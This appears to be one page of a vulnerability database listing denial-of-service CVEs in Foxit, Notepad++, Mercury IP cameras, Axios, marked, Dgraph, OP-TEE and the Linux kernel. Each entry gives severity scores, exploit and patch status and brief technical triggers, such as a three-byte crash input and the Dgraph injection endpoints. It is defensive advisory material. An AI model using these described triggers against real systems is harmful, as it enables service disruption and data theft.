EPSS 0% CVSS 5.5
MEDIUM This Month

Use-after-free vulnerability in Foxit PDF Editor and PDF Reader allows local attackers to crash the application by manipulating document page lifecycle events, causing internal component states to desynchronize and subsequent operations to reference invalidated memory objects. Attack requires user interaction to open a malicious PDF file and does not enable information disclosure or code execution; impact is denial of service with CVSS 5.5 (medium severity). No public exploit code or active exploitation confirmed at time of analysis.

Memory Corruption Use After Free Denial Of Service +2
NVD VulDB
EPSS 0% CVSS 7.8
HIGH This Week

Use-after-free in Foxit PDF Reader and Foxit PDF Editor allows local attackers to execute arbitrary code or crash the application via specially crafted PDF documents. When scripts modify document structures, the software fails to maintain valid object references during page information queries, enabling pointer dereference of freed memory. Successful exploitation requires user interaction to open a malicious PDF file, achieving high confidentiality, integrity, and availability impact with CVSS 7.8. No active exploitation or public exploit code identified at time of analysis, though CVSS vector indicates low attack complexity once victim interaction occurs.

Memory Corruption Use After Free Denial Of Service +2
NVD VulDB
EPSS 0% CVSS 7.8
HIGH This Week

Memory corruption in Foxit PDF Reader and Foxit PDF Editor allows local attackers to crash the application or potentially execute arbitrary code through specially crafted PDF files with malformed form field hierarchies. The vulnerability triggers when parsing logic misidentifies non-signature data as valid signatures, causing invalid memory writes during internal data structure construction. User interaction is required to open the malicious PDF document. No active exploitation has been identified at time of analysis, though the local attack vector and high CVSS score (7.8) warrant attention for endpoint security in environments handling untrusted PDF files.

Denial Of Service Foxit Pdf Editor Foxit Pdf Reader
NVD VulDB
EPSS 0% CVSS 6.6
MEDIUM POC This Month

String injection in Notepad++ 8.9.3 leads to memory address disclosure or application crash when processing maliciously crafted input. Attackers can leverage this remotely without authentication (CVSS 4.0 score 10.0, AV:N/PR:N), though desktop application context suggests user interaction required despite UI:N in vector. Publicly available exploit code exists per GitHub repository llgsjsm/cve-2026-3008. Fixed in version 8.9.4 release candidate per community forum discussion. EPSS data not available for 2026 CVE.

Denial Of Service Notepad
NVD GitHub VulDB
EPSS 0% CVSS 4.4
MEDIUM This Month

A handling issue in the RTSP service of the Mercury MIPC252W 1.0.5 Build 230306 Rel.79931n allows an authenticated attacker to trigger session termination by repeatedly sending SETUP requests for the same media track within a single RTSP session. This causes the server to reset the RTSP connection, leading to a denial-of-service condition.

Denial Of Service
NVD GitHub
EPSS 0% CVSS 6.2
MEDIUM This Month

Denial of service in MERCURY IP camera MIPC252W version 1.0.5 Build 230306 allows unauthenticated local attackers to trigger persistent authentication failure in the RTSP service by sending repeated requests with invalid Digest authentication parameters, preventing legitimate clients from authenticating and causing service unavailability.

Denial Of Service
NVD GitHub
EPSS 0% CVSS 7.5
HIGH This Week

An issue in the /store/items/search endpoint of Agent Protocol server commit e9a89f allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

Denial Of Service N A
NVD GitHub
EPSS 0% CVSS 7.5
HIGH This Week

Denial of service in MERCURY MIPC252W IP camera firmware 1.0.5 Build 230306 Rel.79931n allows remote unauthenticated attackers to crash the device via malformed RTSP SETUP request. Exploitation triggers a null pointer dereference in the RTSP service during Transport header parsing, forcing an automatic reboot. EPSS score of 0.01% indicates very low observed exploitation probability, and no active exploitation or public proof-of-concept has been identified at time of analysis beyond the researcher's GitHub documentation.

Null Pointer Dereference Denial Of Service
NVD GitHub
EPSS 0% CVSS 6.8
MEDIUM POC This Month

P10 Central Management Software 1.4.13 contains a buffer overflow vulnerability in the login password field that allows local attackers to crash the application by submitting an oversized input. Rated medium severity (CVSS 6.8), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Central Management Software
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

ObserverIP Scan Tool 1.4.0.1 contains a denial of service vulnerability that allows local attackers to crash the application by submitting an excessively long string in the IP input field. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Observerip Scan Tool
NVD Exploit-DB VulDB
EPSS 0% CVSS 8.7
HIGH POC This Week

CEWE Photoshow 6.3.4 contains a buffer overflow vulnerability in the login dialog that allows attackers to crash the application by submitting oversized input. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Cewe Photoshow
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

Prime95 29.4b7 contains a buffer overflow vulnerability in the PrimeNet connection dialog that allows local attackers to crash the application by supplying an excessively long string in the optional. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Prime95
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

Bome Restorator 1793 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Name field. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Restorator
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

Easyboot 6.6.0 contains a buffer overflow vulnerability in the Replace Text function that allows local attackers to crash the application by supplying an oversized string. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Easyboot
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

Softdisk 3.0.3 contains a buffer overflow vulnerability in the registration code dialog that allows local attackers to crash the application by supplying an oversized string. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Softdisk
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

StyleWriter 1.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Stylewriter
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.8
MEDIUM POC This Month

Drive Power Manager 1.10 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Name field. Rated medium severity (CVSS 6.8), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Drive Power Manager
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

Easy PhotoResQ 1.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Folder/filename field. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Easy Photoresq
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.8
MEDIUM POC This Month

Fathom 2.4 contains a buffer overflow vulnerability in the Authorization Code field that allows local attackers to crash the application by submitting an oversized input string. Rated medium severity (CVSS 6.8), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Fathom
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

HD Tune Pro 5.70 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the folder/file name field. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Hd Tune Pro
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC PATCH This Month

Nmap 7.70 contains a denial of service vulnerability that allows local attackers to crash the application by processing malicious XML files with exponential entity expansion. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available.

Denial Of Service Red Hat Suse
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.8
MEDIUM POC This Month

Infiltrator Network Security Scanner 4.6 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized input string. Rated medium severity (CVSS 6.8), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Infiltrator Network Security Scanner
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

jiNa OCR Image to Text 1.0 contains a denial of service vulnerability that allows local attackers to crash the application by processing a malformed PNG file. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Jina Ocr Image To Text
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

PicaJet FX 2.6.5 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input to registration fields. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Picajet Fx
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

PixGPS 1.1.8 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized string to the folder path input field. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Pixgps
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.8
MEDIUM POC This Month

RoboImport 1.2.0.72 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input to registration fields. Rated medium severity (CVSS 6.8), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Roboimport
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

InfraRecorder 0.53 contains a denial of service vulnerability that allows local attackers to crash the application by importing a maliciously crafted text file. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Infrarecorder
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

TransMac 12.2 contains a buffer overflow vulnerability in the license key input field that allows local attackers to crash the application by submitting an oversized string. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Denial Of Service Buffer Overflow Transmac
NVD Exploit-DB VulDB
EPSS 0% CVSS 5.5
MEDIUM POC PATCH This Month

Remote denial of service in Cesanta Mongoose up to version 7.20 allows unauthenticated attackers to trigger an infinite loop via manipulation of TCP option length parameters in the handle_opt function, causing service unavailability. Publicly available exploit code exists. Patch released in version 7.21.

Denial Of Service Mongoose
NVD VulDB GitHub
EPSS 0% CVSS 7.8
HIGH PATCH This Week

In the Linux kernel, the following vulnerability has been resolved: net: ipv6: flowlabel: defer exclusive option free until RCU teardown `ip6fl_seq_show()` walks the global flowlabel hash under the seq-file RCU read-side lock and prints `fl->opt->opt_nflen` when an option block is present. Exclusive flowlabels currently free `fl->opt` as soon as `fl->users` drops to zero in `fl_release()`. However, the surrounding `struct ip6_flowlabel` remains visible in the global hash table until later garbage collection removes it and `fl_free_rcu()` finally tears it down. A concurrent `/proc/net/ip6_flowlabel` reader can therefore race that early `kfree()` and dereference freed option state, triggering a crash in `ip6fl_seq_show()`. Fix this by keeping `fl->opt` alive until `fl_free_rcu()`. That matches the lifetime already required for the enclosing flowlabel while readers can still reach it under RCU.

Denial Of Service Linux
NVD VulDB
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

CyberPanel versions prior to 2.4.4 contain an authentication bypass vulnerability in the AI Scanner worker API endpoints that allows unauthenticated remote attackers to write arbitrary data to the database by sending requests to the /api/ai-scanner/status-webhook and /api/ai-scanner/callback endpoints. Attackers can exploit the lack of authentication checks to cause denial of service through storage exhaustion, corrupt scan history records, and pollute database fields with malicious data.

Authentication Bypass Denial Of Service Cyberpanel
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH This Week

Integer overflow in OP-TEE OS RSA signature encoding crashes the Trusted Execution Environment on platforms with RSA hardware acceleration. Affects versions 3.8.0 through 4.10 when attackers supply cryptographic operations with deliberately undersized RSA moduli, causing memset() to overwrite memory until the TEE crashes. This denial-of-service attack requires no authentication and can be triggered remotely (CVSS AV:N/PR:N), completely disabling the secure-world environment that protects cryptographic keys, biometric data, and DRM operations on affected Arm TrustZone systems. EPSS data not available; no active exploitation confirmed at time of analysis.

Denial Of Service Integer Overflow Linux
NVD GitHub VulDB
EPSS 0% CVSS 6.9
MEDIUM POC PATCH This Month

Denial of service in Axios HTTP client before versions 1.15.1 and 0.31.1 allows remote unauthenticated attackers to crash Node.js processes by sending requests with deeply nested object structures that trigger unbounded recursion in the toFormData function. The vulnerability affects both browser and Node.js environments but is exploitable in server-side Node.js deployments where attacker-controlled data is passed to toFormData without depth validation.

Node.js Denial Of Service Axios
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM POC PATCH This Month

Axios HTTP client prior to version 1.15.1 (1.x branch) and 0.31.1 (0.x branch) fails to enforce maxContentLength limits when responseType is set to 'stream', allowing attackers to cause denial of service by streaming unbounded response payloads that bypass configured size restrictions. The vulnerability affects both browser and Node.js environments and requires no authentication or user interaction to exploit.

Node.js Denial Of Service Red Hat
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM POC PATCH This Month

Axios versions prior to 1.15.1 and 0.31.1 allow remote attackers to bypass maxBodyLength restrictions on stream request bodies when maxRedirects is set to 0, enabling denial of service through oversized uploads that consume unbounded server resources. The vulnerability affects the native http/https transport path in Node.js environments and enables attackers to send streamed payloads that exceed configured size limits, potentially exhausting memory or bandwidth on the target application.

Node.js Denial Of Service Red Hat
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH POC PATCH This Week

Unauthenticated remote attackers can crash Node.js applications using marked versions 18.0.0-18.0.1 by sending a specially crafted 3-byte sequence (tab, vertical tab, newline). The infinite recursion loop exhausts memory and triggers an out-of-memory crash, enabling complete denial of service against any exposed markdown parsing endpoint. Vendor-released patch fixes the vulnerability in version 18.0.2. No public exploit identified at time of analysis, though the attack input is trivially simple and reproducible. CVSS v4.0 8.7 reflects high availability impact with network reachability and no authentication barriers.

Node.js Denial Of Service Red Hat
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Unbounded memory allocation in Eclipse zserio serialization framework allows remote attackers to trigger system crashes via crafted payloads as small as 4-5 bytes, forcing allocations up to 16 GB and causing out-of-memory errors. Affects both C++ and Java runtimes used in Navigation Data Standard (NDS) implementations deployed across millions of vehicles from Toyota, BMW, Volkswagen, Mercedes-Benz, and 39 other automotive manufacturers. Vendor-released patch available in zserio v2.18.1, addressing unchecked length parameters in Array.h, BitStreamReader.h, and Java runtime equivalents. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) indicates trivial remote exploitation without authentication.

Docker Java Denial Of Service
NVD GitHub VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Pre-authentication NoSQL injection in Dgraph allows remote unauthenticated attackers to exfiltrate entire databases and modify schemas via crafted JSON mutation keys. The vulnerability exploits unsanitized language tag fields in the addQueryIfUnique function, enabling DQL query injection through specially crafted HTTP POST requests to port 8080. Attackers can extract all database contents including credentials, secrets, and AWS keys with two HTTP requests against default configurations where ACL is disabled. CVSS 9.1 (Critical) with network vector, no authentication required, and low attack complexity. No public exploit code confirmed outside the GitHub advisory, though a complete proof-of-concept with video demonstration exists in the advisory. EPSS data not available for this recent CVE.

Docker Authentication Bypass Denial Of Service +3
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Remote unauthenticated attackers can exfiltrate all data from Dgraph databases via DQL injection in the /mutate endpoint's cond parameter. Default configurations with ACL disabled allow single HTTP POST requests to bypass authentication and execute arbitrary read queries, returning complete database contents including credentials, PII, and secrets. The vulnerability exploits unsanitized string concatenation in buildUpsertQuery() where user-supplied cond values are written directly into DQL queries without escaping or validation. Proof-of-concept demonstrates extraction of AWS credentials, GCP service account keys, and user secrets in a single request. No public exploitation confirmed at time of analysis, but POC code publicly available via GitHub advisory. EPSS data not available; CVSS 9.1 indicates critical severity with network vector and no authentication required.

Docker Authentication Bypass Denial Of Service +3
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Infinite recursion in LiquidJS template engine crashes Node.js processes via out-of-memory condition when attackers submit templates with circular block references. Unauthenticated remote attackers can consume ~4GB RAM and terminate any application accepting user-provided Liquid templates by nesting identically-named blocks within `{% layout %}` / `{% block %}` tags. Vendor patch available via GitHub commit e2311df. CVSS 7.5 (High) reflects network-accessible, low-complexity attack requiring no privileges or user interaction, causing complete availability loss.

Node.js Denial Of Service
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Use-after-free in Linux kernel batman-adv (B.A.T.M.A.N. Advanced mesh networking) allows remote network attackers to trigger memory corruption and potentially execute arbitrary code. The batadv_bla_add_claim() function can prematurely drop a gateway reference while readers still access the pointer, causing netlink dump and claim-check paths to dereference freed memory. Despite CVSS 9.8 critical rating, exploitation probability is low (EPSS 2%, 7th percentile), no active exploitation confirmed, and patches available across kernel stable branches 6.1.169, 6.6.135, 6.12.82, 6.18.23, 6.19.13, and mainline 7.0.

Linux Null Pointer Dereference Denial Of Service
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: mmc: vub300: fix NULL-deref on disconnect Make sure to deregister the controller before dropping the reference to the driver data on disconnect to avoid NULL-pointer dereferences or use-after-free.

Null Pointer Dereference Linux Denial Of Service
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Race condition in Linux kernel memory management allows local attackers with low privileges to corrupt kernel page state, potentially achieving high-impact denial of service, data corruption, or privilege escalation. The vulnerability affects kernel versions 6.6.x through 7.0-rc3, with patches confirmed released for stable branches 6.6.135, 6.12.82, 6.18.23, 6.19.13, and mainline 7.0. EPSS exploitation probability is low (0.02%, 5th percentile), and no public exploit code or active exploitation has been identified at time of analysis. The CVSS vector (AV:L/AC:L/PR:L/UI:N) indicates local access with low attack complexity, while the specific race condition requires precise timing between file mapping and inode size modification operations.

Denial Of Service Linux Integer Overflow +2
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: net: lan966x: fix page_pool error handling in lan966x_fdma_rx_alloc_page_pool() page_pool_create() can return an ERR_PTR on failure. The return value is used unconditionally in the loop that follows, passing the error pointer through xdp_rxq_info_reg_mem_model() into page_pool_use_xdp_mem(), which dereferences it, causing a kernel oops. Add an IS_ERR check after page_pool_create() to return early on failure.

Null Pointer Dereference Linux Denial Of Service +2
NVD VulDB
Prev Page 33 of 406 Next

Quick Facts

Typical Severity
MEDIUM
Category
other
Total CVEs
36512

MITRE ATT&CK

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy